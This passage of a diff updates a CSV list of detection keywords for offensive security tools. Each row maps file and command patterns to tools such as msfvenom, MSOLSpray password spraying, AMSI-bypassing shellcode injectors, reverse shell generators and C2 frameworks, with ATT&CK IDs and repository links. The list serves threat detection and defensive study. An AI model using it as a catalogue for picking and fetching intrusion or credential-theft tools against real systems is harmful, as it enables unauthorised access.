- T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","10","10","36","8","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z" "*msfvenom *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*msfvenom -*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfvenom -*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*msfvenom -*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfvenom -*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*--msfvenom *","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). 
Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*Mshikaki.exe*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" "*Mshikaki-main*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" "*mshta/shellcode_inject*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*MSHTAStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*msi-search-main.zip*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*msLDAPDump.py*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*MSOfficeManipulator.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*msol_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*MSOLSpray *","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","0","N/A","10","8","734","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" -"*MSOLSpray.git*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","734","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" -"*MSOLSpray.ps1*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","734","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" -"*MSOLSpray-master*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","734","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*msol_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"*msol_dump.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*MSOLSpray *","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","0","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*MSOLSpray.git*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*MSOLSpray.ps1*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*MSOLSpray-master*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" "*mspass.exe*","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. 
and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mspass.zip*","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*msquic_openssl/msquic.dll*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*msquic_openssl/msquic.lib*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" -"*MS-RPNVulnerableDC.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
+"*MS-RPNVulnerableDC.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*MS-RPRN.exe *","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation From attacking machine entice the Domain Controller to connect using the printer bug. Binary from here https://github.com/leechristensen/SpoolSample","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*MS-RPRN.exe \\* \\*/pipe/pwned*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*mssgbox_shellcode_arranged_x64.b64*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" 
@@ -13810,20 +13970,20 @@ "*mssgbox_shellcode_x64.bin*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_x64_with_hexsymbol.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_x64_without_hexsymbol.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" -"*mssql_brute.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*mssql_local_auth_bypass.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*mssql_local_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*mssql_brute.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mssql_local_auth_bypass.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mssql_local_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*mssqlattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*mssqlattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mssqlattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*mssqlproxy-master*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" -"*mssqlrelayclient.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mssqlrelayclient.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*mssqlrelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*mssqlsvc.kirbi*","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mthbernardes*rsg*","offensive_tool_keyword","rsg","A tool to generate various ways to do a reverse shell","T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007","TA0002 - TA0011 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/mthbernardes/rsg","1","1","N/A","N/A","6","541","133","2023-04-27T10:32:21Z","2017-12-12T02:57:07Z" "*mttaggart/OffensiveNotion*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" -"*multi_meter_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*multi_vendor_cctv_dvr_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
